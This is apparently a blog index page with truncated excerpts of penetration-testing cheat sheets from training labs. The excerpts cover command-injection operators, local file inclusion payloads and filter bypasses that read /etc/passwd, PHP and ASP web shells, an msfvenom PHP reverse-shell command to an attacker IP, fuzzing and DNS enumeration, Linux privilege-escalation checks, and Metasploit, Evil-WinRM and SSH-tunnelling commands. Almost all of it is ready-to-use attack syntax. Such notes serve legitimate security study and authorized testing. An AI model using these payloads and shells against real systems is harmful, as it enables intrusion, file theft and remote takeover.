Welcome to 0pwn0's Blog

Injection Operators Injection Operator Injection Character URL-Encoded Character Executed Command Semicolon ; %3b Both New Line \n %0a Both Background & %26 Both (second output generally shown first) Pipe | %7c Both (only second output is shown) AND && %26%26 Both (only if first succeeds) OR || %7c%7c Second (only if first fails) Sub-Shell `` %60%60 Both (Linux-only) Sub-Shell $() %24%28%29 Both (Linux-only) LinuxFiltered Character Bypass Code Description ...

Local File Inclusion Command Description Basic LFI /index.php?language=/etc/passwd Basic LFI /index.php?language=../../../../etc/passwd LFI with path traversal /index.php?language=/../../../etc/passwd LFI with name prefix /index.php?language=./languages/../../../../etc/passwd LFI with approved path LFI Bypasses /index.php?language=....//....//....//....//etc/passwd Bypass basic path traversal filter /index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%6...

Web Shells Web Shell Description <?php file_get_contents('/etc/passwd'); ?> Basic PHP File Read <?php system('hostname'); ?> Basic PHP Command Execution <?php system($_REQUEST['cmd']); ?> Basic PHP Web Shell <% eval request('cmd') %> Basic ASP Web Shell msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php Generate PHP reverse shell PHP Web Shell PHP Web Shell PHP Reverse Shell PHP Reverse Shell...

Infrastructure-based Enumeration Command Description curl -s https://crt.sh/\?q\=<target-domain>\&output\=json | jq . Certificate transparency. for i in $(cat ip-addresses.txt);do shodan host $i;done Scan each IP address in a list using Shodan. Host-based EnumerationFTP Command Description ftp <FQDN/IP> Interact with the FTP service on the target. nc -nv <FQDN/IP> 21 Interact with the FTP service on the target. telnet <FQDN/IP> 21 Interact with t...

Ffuf Command Description ffuf -h ffuf help ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ Directory Fuzzing ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZ Extension Fuzzing ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.php Page Fuzzing ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v Recursive Fuzzing ffuf -w wordlist.txt:FUZZ -u https://FUZZ.hackthebox.eu/ Sub-domain Fuzzing ffuf -w wordlis...

WHOIS Command Description export TARGET="domain.tld" Assign target to an environment variable. whois $TARGET WHOIS lookup for the target. DNS Enumeration Command Description nslookup $TARGET Identify the A record for the target domain. nslookup -query=A $TARGET Identify the A record for the target domain. dig $TARGET @<nameserver/IP> Identify the A record for the target domain. dig a $TARGET @<nameserver/IP> Identify the A record for the target domai...

Command Description ssh htb-student@<target IP> SSH to lab target ps aux | grep root See processes running as root ps au See logged in users ls /home View user home directories ls -l ~/.ssh Check for SSH keys for current user history Check the current user’s Bash history sudo -l Can the user run anything as another user? ls -la /etc/cron.daily Check for daily Cron jobs lsblk Check for unmounted file systems/drives find / -path /proc -prune -o -type d -perm -...

MSFconsole Commands Command Description show exploits Show all exploits within the Framework. show payloads Show all payloads within the Framework. show auxiliary Show all auxiliary modules within the Framework. search <name> Search for exploits or modules within the Framework. info Load information about a specific exploit or module. use <name> Load an exploit or module (example: use windows/smb/psexec). use <number> Load an exploit by using the i...

Connecting to Target Command Description xfreerdp /v:<ip> /u:htb-student /p:HTB_@cademy_stdnt! CLI-based tool used to connect to a Windows target using the Remote Desktop Protocol. evil-winrm -i <ip> -u user -p password Uses Evil-WinRM to establish a Powershell session with a target. ssh user@<ip> Uses SSH to connect to a target using a specified user. smbclient -U user \\\\<ip>\\SHARENAME Uses smbclient to connect to an SMB share using a specified user. p...

Command Description ifconfig Linux-based command that displays all current network configurations of a system. ipconfig Windows-based command that displays all system network configurations. netstat -r Command used to display the routing table for all IPv4-based protocols. nmap -sT -p22,3306 <IPaddressofTarget> Nmap command used to scan a target for open ports allowing SSH or MySQL connections. ssh -L 1234:localhost:3306 Ubuntu@<IPaddressofTarget> SSH comand used to ...